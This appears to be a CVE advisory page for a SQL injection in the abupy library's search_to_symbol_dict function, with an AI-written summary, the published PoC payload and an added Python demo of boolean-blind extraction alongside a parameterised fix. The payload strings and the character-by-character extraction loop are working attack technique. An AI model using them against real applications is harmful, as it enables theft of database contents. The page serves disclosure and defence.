VYPR
Unrated severity · NVD Advisory · Published Sep 5, 2023 · Updated Sep 30, 2024

CVE-2023-39654

Description

abupy up to v0.4.0 was discovered to contain a SQL injection vulnerability via the component abupy.MarketBu.ABuSymbol.search_to_symbol_dict.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SQL injection in abupy <= v0.4.0 via search_to_symbol_dict allows arbitrary SQL execution.

Vulnerability

A SQL injection vulnerability exists in the abupy library up to version v0.4.0, specifically in the abupy.MarketBu.ABuSymbol.search_to_symbol_dict function [1][2]. The function is designed to search for stock symbols but fails to sanitize user-supplied input, allowing an attacker to inject arbitrary SQL commands into the underlying SQLite query [2]. The affected versions are all releases up to and including v0.4.0 [1].

Exploitation

An attacker exploits this vulnerability by calling search_to_symbol_dict with a crafted string argument [2]. No authentication or special privileges are required: the function is a public API intended for normal use [2], so in practice the exposed surface is any application that forwards user-controlled search text into it. The payload uses a UNION SELECT with a CASE expression conditioned on an arbitrary SQL boolean (e.g., sqlite_version() = '3.31.1') to perform boolean-based blind SQL injection [2]. For example, the payload "us----' union select case when (sqlite_version() = '3.31.1') then 'usJASNW' else 'usTROVW' end where ''='" yields one of two marker symbols depending on whether the condition holds, confirming that the injected SQL is executed [2].

Impact

Successful exploitation allows an attacker to execute arbitrary SQL queries against the SQLite database used by abupy [2]. This can lead to information disclosure, such as extracting the database version, table contents, or other data stored in the database [2]. The proof-of-concept demonstrates the ability to evaluate arbitrary boolean conditions; repeated true/false probes of this kind are enough to extract stored data one character at a time (blind extraction) [2]. The attacker can therefore read any data in the SQLite database reachable from the injected query, compromising confidentiality.

Mitigation

As of the publication date (2023-09-05), no patched version has been released [1][2], and the latest version, v0.4.0, remains vulnerable. Callers should not pass untrusted input to search_to_symbol_dict. Where that cannot be avoided, validate the search string at the call site against a strict allow-list (for example, only the characters that legitimately occur in symbol names), or patch the query locally so the search string is bound as a parameter instead of being formatted into the SQL text. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Monitor the official repository [1] for future updates.
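To make the Exploitation and Mitigation sections concrete, the following is an added example and not abupy's own code. It is a constructed reproduction of the pattern the advisory describes: a search function that formats its argument into a SQLite query (the table name, column names, sample rows and the LIKE '%...' shape are all assumptions, since the real schema is not shown here), a boolean oracle built in the shape of the PoC payload, a blind-extraction loop that generalises the PoC's version check to reading any SQL expression, and the parameterised form of the query that the Mitigation section recommends.

```python
import sqlite3

# Constructed stand-in for a symbol table. abupy's real schema is not shown
# on this page, so the table, column names and rows here are assumptions.
SAMPLE_SYMBOLS = [
    ("usAAPL", "Apple Inc"),
    ("usTSLA", "Tesla Inc"),
    ("usGOOG", "Alphabet Inc"),
    ("hk00700", "Tencent Holdings"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stock_symbols (symbol TEXT, name TEXT)")
    conn.executemany("INSERT INTO stock_symbols VALUES (?, ?)", SAMPLE_SYMBOLS)
    conn.commit()
    return conn


def search_vulnerable(conn, search):
    """Hypothetical reproduction of the flawed pattern (not abupy's code):
    the search string is formatted straight into the SQL text, so a quote
    inside it terminates the literal and the remainder is parsed as SQL."""
    query = "SELECT symbol FROM stock_symbols WHERE symbol LIKE '%{}'".format(search)
    return [row[0] for row in conn.execute(query)]


def search_fixed(conn, search):
    """Hardened form: the search string is bound as a parameter, so quotes
    and keywords inside it are matched as data and never parsed as SQL."""
    query = "SELECT symbol FROM stock_symbols WHERE symbol LIKE ('%' || ?)"
    return [row[0] for row in conn.execute(query, (search,))]


def build_payload(condition):
    """Payload in the shape of the advisory's PoC: close the open string
    literal, UNION in a CASE that yields one of two marker symbols depending
    on `condition`, then end with WHERE ''=' so the query's own trailing
    quote completes the expression as ''=''."""
    return (
        "zz' UNION SELECT CASE WHEN ({}) THEN 'usTRUE' ELSE 'usFALSE' END "
        "WHERE ''='"
    ).format(condition)


def boolean_oracle(conn, condition):
    """Evaluate an arbitrary SQL boolean through the vulnerable function."""
    return "usTRUE" in search_vulnerable(conn, build_payload(condition))


def extract_via_oracle(conn, expression, max_len=32):
    """Blind extraction: recover the text value of any SQL expression one
    character at a time, binary-searching each character code (0..127) with
    the true/false oracle. This generalises the PoC's single version check."""
    out = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(conn, "length({}) >= {}".format(expression, pos)):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(substr({}, {}, 1)) > {}".format(expression, pos, mid)
            if boolean_oracle(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:", search_vulnerable(db, "AAPL"))
    print("oracle 1=1:", boolean_oracle(db, "1=1"), "| oracle 1=2:", boolean_oracle(db, "1=2"))
    print("leaked sqlite_version():", extract_via_oracle(db, "sqlite_version()"))
    # The same payload against the parameterised query is just an odd search
    # string that matches no symbol.
    print("payload vs fixed query:", search_fixed(db, build_payload("1=1")))
```

The point of extract_via_oracle is that the PoC's one true/false answer is already a complete data channel: roughly seven queries per character recover any value the database can compute, including table contents. Against search_fixed the identical payload returns an empty list, because the bound parameter is compared as a string rather than parsed, which is why binding the search string is the fix and call-site filtering only a stopgap.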

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • abupy/abupy
  • bbfamily/abu
    Range: <=0.4.0

Patches

No patches discovered yet.

References
